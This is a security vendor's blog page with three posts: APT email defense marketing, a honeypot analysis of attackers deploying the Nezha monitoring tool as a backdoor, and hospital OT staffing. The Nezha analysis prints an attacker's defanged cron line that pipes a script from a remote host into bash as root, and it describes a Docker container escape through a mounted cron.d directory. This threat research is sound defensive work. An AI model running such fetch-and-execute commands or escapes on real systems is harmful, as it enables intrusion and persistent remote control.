Blog
/
Email
/
February 13, 2025

Why Darktrace / EMAIL Excels Against APTs

APTs are sophisticated threat actors with the resources to coordinate and achieve long-term objectives. Amidst the skyrocketing numbers of BEC attacks, every organization should be worried about the ability of intruders to infiltrate and exploit. This blog will look at several recent examples of complex email attacks and how Darktrace / EMAIL successfully disarmed and prevented intrusion.
Written by
Carlos Gray
Senior Product Marketing Manager, Email
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Carlos Gray
Senior Product Marketing Manager, Email
Default blog image
13
Feb 2025

What are APTs?

An Advanced Persistent Threat (APT) describes an adversary with sophisticated levels of expertise and significant resources, with the ability to carry out targeted cyber campaigns. These campaigns may penetrate an organization and remain undetected for long periods, allowing attackers to gather intelligence or cause damage over time.

Over the last few decades, the term APT has evolved from being almost exclusively associated with nation-state actors to a broader definition that includes highly skilled, well-resourced threat groups. While still distinct from mass, opportunistic cybercrime or "spray and pray" attacks, APT now refers to the elite tier of adversaries, whether state-sponsored or not, who demonstrate advanced capabilities, persistence, and a clear strategic focus. This shift reflects the growing sophistication of cyber threats, where non-state actors can now rival nation-states in executing covert, methodical intrusions to achieve long-term objectives.

These attacks are resource-intensive for threat actors to execute, but the potential rewards—ranging from financial gain to sensitive data theft—can be significant. In 2020, Business Email Compromise (BEC) attacks netted cybercriminals over $1.8 billion.1

And recently, the advent of AI has helped to automate launching these attacks, lowering the barriers to entry and making it more efficient to orchestrate the kind of attack that might previously have taken weeks to create. Research shows that AI can do 90% of a threat actor’s work2 – reducing time-to-target by automating tasks rapidly and avoiding errors in phishing communications. Email remains the most popular vector for initiating these sophisticated attacks, making it a critical battleground for cyber defense.

What makes APTs so successful?

The success of Advanced Persistent Threats (APTs) lies in their precision, persistence, and ability to exploit human and technical vulnerabilities. These attacks are carefully tailored to specific targets, using techniques like social engineering and spear phishing to gain initial access.

Once inside, attackers move laterally through networks, often remaining undetected for months or even years, silently gathering intelligence or preparing for a decisive strike. Alternatively, they might linger inside an account within the M365 environment, which could be even more valuable in terms of gathering information – in 2023 the average time to identify a breach in 2023 was 204 days.3

The subtle and long-term outlook nature of APTs makes them highly effective, as traditional security measures often fail to identify the subtle signs of compromise.

How Darktrace’s approach is designed to catch the most advanced threats

Luckily for our customers, Darktrace’s AI approach is uniquely equipped to detect and neutralize APTs. Unlike the majority of email security solutions that rely on static rules and signatures, or that train their AI on previous known-bad attack patterns, Darktrace leverages Self-Learning AI that baselines normal patterns of behavior within an organization, to immediately detect unusual activity that may signal an APT in progress.  

But in the modern era of email threats, no email security solution can guarantee 100% effectiveness. Because attackers operate with great sophistication, carefully adapting their tactics to evade detection – whether by altering attachments, leveraging compromised accounts, or moving laterally across an organization – a siloed security approach risks missing these subtle, multi-domain threats. That’s why a robust defense-in-depth strategy is essential to mitigate APTs.

Real-world threat finds: Darktrace / EMAIL in action

Let’s take a look at some real-world scenarios where Darktrace / EMAIL stopped tactics associated with APT campaigns in their tracks – from adversary-in-the-middle attacks to suspicious lateral movement.

1: How Darktrace disrupted an adversary-in-the-middle attack by identifying abnormal login redirects and blocking credential exfiltration

In October 2024, Darktrace detected an adversary-in-the-middle (AiTM) attack targeting a Darktrace customer. The attack began with a phishing email from a seemingly legitimate Dropbox address, which contained multiple link payloads inviting the recipient to access a file. Other solutions would have struggled to catch this attack, as the initial AitM attack was launched through delivering a malicious URL through a trusted vendor or service. Once compromised, the threat actor could have laid low on the target account, gathering reconnaissance, without detection from the email security solution.  

Darktrace / EMAIL identified the abnormal login redirects and flagged the suspicious activity. Darktrace / IDENTITY then detected unusual login patterns and blocked credential exfiltration attempts, effectively disrupting the attack and preventing the adversary from gaining unauthorized access. Read more.

Figure 1: Overview of the malicious email in the Darktrace / EMAIL console, highlighting Dropbox associated content/link payloads

2: How Darktrace stopped lateral movement to block NTLM hash theft

In early 2024, Darktrace detected an attack by the TA577 threat group, which aimed to steal NTLM hashes to gain unauthorized access to systems. The attack began with phishing emails containing ZIP files that connected to malicious infrastructure.  

A traditional email security solution would have likely missed this attack by focusing too heavily on analyzing the zip file payloads or relying on reputation analysis to understand whether the infrastructure was registered as bad before this activity was a recognized IoC.

Because it correlates activity across domains, Darktrace identified unusual lateral movement within the network and promptly blocked the attempts to steal NTLM hashes, effectively preventing the attackers from accessing sensitive credentials and securing the network. Read more.

Figure 2: A summary of anomaly indicators seen for a campaign email sent by TA577, as detected by Darktrace / EMAIL

3: How Darktrace prevented the WarmCookie backdoor deployment embedded in phishing emails

In mid-2024, Darktrace identified a phishing campaign targeting organizations with emails impersonating recruitment firms. These emails contained malicious links that, when clicked, deployed the WarmCookie backdoor.  

These emails are difficult to detect, as they use social engineering tactics to manipulate users into engaging with emails and following the embedded malicious links – but if a security solution is not analysing content and context, these could be allowed through.

In several observed cases across customer environments, Darktrace detected and blocked the suspicious behavior associated with WarmCookie that had already managed to evade customers’ native email security. By using behavioral analysis to correlate anomalous activity across the digital estate, Darktrace was able to identify the backdoor malware strain and notify customers. Read more.

Conclusion

These threat examples highlight a key principle of the Darktrace approach – that a backwards-facing approach grounded in threat intelligence will always be one step behind.

Most threat actors operate in campaigns, carefully crafting attacks and testing them across multiple targets. Once a campaign is identified, good defenders and traditional security solutions quickly update their defenses with new threat intelligence, rules, and signatures. However, APTs have the resources to rapidly adapt – spinning up new infrastructure, modifying payloads and altering their attack footprint to evade detection.

This is where Darktrace / EMAIL excels. Only by analyzing each user, message and interaction can an email security solution hope to catch the types of highly-sophisticated attacks that have the potential to cause major reputational and financial damage. Darktrace / EMAIL ensures that even the most subtle threats are detected and blocked with autonomous response, before causing impact – helping organizations remain one step ahead of increasingly adaptive threat actors.

Download the Darktrace / EMAIL Solution Brief

Discover the most advanced cloud-native AI email security solution to protect your domain and brand while preventing phishing, novel social engineering, business email compromise, account takeover, and data loss.

  • Gain up to 13 days of earlier threat detection and maximize ROI on your current email security
  • Experience 20-25% more threat blocking power with Darktrace / EMAIL
  • Stop the 58% of threats bypassing traditional email security

References

[1] FBI Internet Crime Report 2020

[2] https://www.optiv.com/insights/discover/blog/future-security-automation-how-ai-machine-learning-and-automation-are

[3] IBM Cost of a Data Breach Report 2023

Written by
Carlos Gray
Senior Product Marketing Manager, Email
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Carlos Gray
Senior Product Marketing Manager, Email

How Attackers Abuse the Chinese Nezha Monitoring Tool

Network
June 10, 2026
Nathaniel Bill
Malware Research Engineer
Watch the NIS2 Webinar
Trending blogs
1
Prompt Security in Enterprise AI: Strengths, Weaknesses, and Common Approaches
May 20, 2026
2
What the Darktrace Annual Threat Report 2026 Means for Security Leaders
Feb 26, 2026
3
Journey of a Threat: How Multi-Layered AI Works in Darktrace / EMAIL
May 26, 2026
4
How to Evaluate AI Vendors: 5 Key categories for AI Adoption
May 27, 2026
5
Darktrace Unites Human Behavior and Threat Detection Across Email, Slack, Teams, and Zoom
Mar 24, 2026

More in this series

No items found.
Continue reading
Email
May 26, 2026

Journey of a Threat: How Multi-Layered AI Works in Darktrace / EMAIL

Follow a malicious email as it moves through Darktrace / EMAIL’s multi-layered AI system, from raw data to final decision. Each layer works together to detect threats, understand intent, and take autonomous action.
Jamie Bali
Technical Author (AI) Developer
Read more
Email
May 1, 2026

How email-delivered prompt injection attacks can target enterprise AI – and why it matters

Prompt injection is a newly emerging threat, with only a handful of confirmed victims so far – targeting how AI systems use data rather than exploiting traditional software vulnerabilities. As agentic AI becomes embedded across enterprise environments, attackers may attempt to manipulate these systems through hidden instructions in everyday email content.
Kiri Addison
Senior Director of Product
Read more
Email
April 24, 2026

Email-Borne Cyber Risk: A Core Challenge for the CISO in the Age of Volume and Sophistication

A former CISO shares his perspective on the challenge of securing the human layer, how existing security awareness training falls short, and how it can be improved to better prepare for high-volume, high-impact, human-centric threats.
Karim Benslimane
VP, Field CISO
Read more

Blog

/

Network

/

June 10, 2026

How Attackers Abuse the Chinese Nezha Monitoring Tool

nezha monitoring toolDefault blog imageDefault blog image

What is Nezha?

Nezha is an open-source tool that allows system administrators to centrally monitor multiple servers, including their resource usage such as CPU and network usage, and uptime. The tool also enables remote administrative access via an interactive shell.

The project has just under 10,000 stars on GitHub and has seen widespread adoption in the Chinese IT community, with many forum posts providing guides on installation and usage.

However, Nezha’s status as a legitimate executable that has remote access capabilities creates an opportunity for misuse. Instead of deploying a regular command-and-control (C2) implant, attackers can deploy Nezha directly on compromised hosts. As these deployments are functionally indistinguishable from legitimate installations, they can blend into expected operational tooling and evade detection.

Darktrace’s analysis of a Nezha infection

Darktrace operates several high-interaction honeypots to observe attacker techniques and behaviors. Darktrace analysts observed an intrusion against the Docker-based honeypot, initiated with a malicious container create command.

The malicious container create command.
Figure 1: The malicious container create command.

Docker allows any host file or directory to be passed through to a container, granting read and write access. In this case, the attacker made use of this to pass through the cron.d directory, which is used to schedule recurring tasks, such as maintenance or backup commands.

These commands and timings are stored in the cron.d directory, which the attacker can now write to because it is passed through to their malicious container. By writing a job to this directory from within the container, the cron service running on the host detects the new job and executes it on the host, effectively allowing the attacker to escape the container.

The attacker the created a malicious cron job named ngk:
* * * * * root curl hxxps://file.gpu5[.]com/linux_install.sh | bash

This resulted in the host downloading and running the linux_install.sh file with root privileges.

The linux_install script installs several dependencies, sets up environmental variables, and retrieves a second-stage script (nezha_install.sh) from the same domain.

The linux_install script.
Figure 2: The linux_install script.

The nezha_install.sh script based on the official Nezha installer but has been modified to hard code configuration values, such as the server address, and to remove interactive prompts, allowing it to be installed without user input.

Open by design

One of Nezha’s most interesting design choices is that its main monitoring panel does not require authentication to view a list of monitored hosts. This exposes a list of compromised systems via the attacker-controlled panel, enabling direct observation of the operation’s scale, victimology and infrastructure.

The attacker’s Nezha dashboard.
Figure 3: The attacker’s Nezha dashboard.

At the time of analysis, the campaign had infected 141 servers, with 45 still online and accessible.  The number of online servers was previously higher, suggesting that some victims may have discovered and removed the infection.

The exposed dashboard provides insights into victim characteristics, including geographic distribution, hardware specification, and resource usage. Most infected hosts were low-spec systems, commonly one or two core Xeon CPUs and less than 4GB of RAM, indicating they were likely small virtual private servers (VPS) with limited value to the attacker.

Many systems also exhibited 100% CPU usage, which may indicate concurrent compromise, such as cryptocurrency mining activity by other threat actors.

Open-source intelligence platforms such as Shodan and Censys can also identify publicly exposed instances of Nezha. Although authentication is required to execute commands on a monitored server, visibility into dashboards still provides valuable intelligence for attackers and defenders alike.

At the time of writing, Darktrace identified 33 internet-facing Nezha installations as openly accessible.

Key takeaways

The abuse of legitimate software has become a consistent feature of modern intrusion activity, enabling attackers to operate without deploying traditional malware and reducing the risk of detection.

This creates a form of “trust inversion”, where tools typically associated with routine operations may instead indicate malicious activity when deployed outside expected contexts. Organizations should therefore prioritize asset visibility and software governance, ensuring that unexpected tool deployments can be identified and investigated, rather than focusing solely on malware-centric detection.

This challenge is especially pronounced in cloud environments, where legitimate monitoring tools may represent either essential software or an attacker backdoor. The scale and dynamic nature of cloud environments further complicate distinguishing between benign and malicious use.

Credit to Nathaniel Bill (Malware Research Engineer)
Edited by Ryan Traill (Content Manager)

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer

Blog

/

OT

/

June 9, 2026

Healthcare’s OT Cybersecurity Gap: Why Hospitals Must Make the Same Security Investments as Regulated Critical Infrastructures

healthcare OTDefault blog imageDefault blog image

Rethinking the healthcare attack surface

When most people think about Operational Technology (OT) cybersecurity, they think about oil & gas pipelines, utilities, manufacturing plants, or power grids. However, hospitals & healthcare systems have quickly become a point of focus in the OT cybersecurity community as they do employ a variety of OT in the form of IoMT (Internet of Medical Things) networked devices such as: infusion pumps, imaging systems, patient monitoring equipment, laboratory systems, and traditional industrial control systems (ICS) in the form of smart building management systems (BMS) and even on site power generation control systems. 

These healthcare environments are no longer just traditional IT ecosystems, they are cyber-physical environments where disruption can directly impact patient care, operational continuity, and ultimately patient safety.

The OT cybersecurity expertise gap in healthcare organizations

Our research in the OT cybersecurity space revealed a concerning trend. Many hospitals and healthcare networks lack dedicated OT cybersecurity teams, OT security full time employees (FTE) and even OT expertise in the form of OT security certifications when compared to other critical infrastructure sectors.

On the other hand, within industries such as energy and manufacturing, we encounter more mature OT security programs that employ full time employees  dedicated to OT cybersecurity with OT security certifications and expertise to secure industrial and operational environments and lead investment in OT security processes and technology.

When reviewing the top 20 U.S. Hospitals by market cap, given what is publicly available on LinkedIn, only one FTE with an OT cybersecurity certification was found. The certifications that were searched for include: GIAC GICSP, GIAC GRID, GIAC GCIP and all ISA/IEC 62443 certifications. When replicating this same search across the top 20 utility providers in the US, 73 FTEs with OT related certifications were identified. As a control group, we looked within financial services, an industry NOT expected to have OT systems worth investing in FTEs to protect. However, the top 20 US financial institutions had 18 FTEs with OT related certifications. 

What these findings reveal

Overall, the findings regarding healthcare investment in OT security FTEs are surprising given how operationally dependent modern healthcare has become on OT. So why aren't hospitals investing in OT security personnel at the rate of peer critical infrastructures? It could just be lack of awareness; however, there are other, more plausible reasons.  

Based on historical trends in cyber incidents within the healthcare space, one could speculate that there is significantly greater likelihood of being victim to an attack that  focuses on extortion or data theft rather than an attack on specific OT systems. The amount of ransomware events incurred in healthcare, that historically do not target OT systems, may divert attention and security investment to the parts of the attack surface most likely to be targeted by ransomware. Additionally, data theft is a relevant threat objective for hospitals given PHI, PCI and PII, and data theft does not traditionally align with attacks targeting OT.  

However, with focused investment to address data theft and with adversaries new capability to string together chains of vulnerabilities of different severity scores using advancements in AI, we could be entering a threat landscape where adversaries pivot their tactics to target exposed and under protected devices and systems like OT. For example, although not a patient records database, predominant IOMT protocols HL7 and DICOM are unencrypted plaintext protocols and unless encrypted it is very simple for adversaries, who are sniffing traffic, to identify protected health information (PHI) in these communication protocols.

Why OT cybersecurity expertise can be effective for healthcare organizations

The convergence of IT, OT, and IoMT is already here, and threat actors are increasingly aware of the operational vulnerabilities that come with it. Additionally, as AI solutions such as agentic or generative applications are adopted and deployed, the attack surface will continue to change as permissions, and new connections will exist to support AI efficiency. From a cybersecurity standpoint, the reality is that many healthcare organizations are still working to establish consistent visibility and governance across their enterprise-connected devices and systems as their attack surface is changing in real time.  As the healthcare sector remains a significant target for cyber-attacks, hospitals would be well advised to begin addressing their operational environments OT as a critical component of their attack surface and invest in securing them first with people, then process and technology. 

What can healthcare organizations do to secure their OT

Including OT in current cybersecurity processes such as red teaming and testing incident response plans that take OT into account alongside building dedicated OT security capabilities including improving OT network visibility, leveraging OT network anomaly detection, micro-segmentation, and secure remote access will become essential steps in strengthening healthcare resilience. 

However, before any of the above processes or investments in technology can be made, these healthcare organizations, like the other critical infrastructure sectors, need to invest in the people with the experience in OT security to lead, implement, manage and audit the investment in OT cybersecurity technology and processes.  In cases where headcount cannot be added, investment in OT security certifications, such as the ones listed in this article, and participation on OT security events focused on practitioner training for existing cybersecurity employees can move the needle in terms of bringing OT expertise to the existing team.  

In an industry where uptime and safety are as mission critical as they are for a power utility, OT cybersecurity FTEs can no longer be viewed as optional for healthcare organizations and must become part of the foundation of modern healthcare cybersecurity strategy. 

[related-resource]

Continue reading
About the author
Daniel Simonds
Director of Operational Technology
Your data. Our AI.
Elevate your network security with Darktrace AI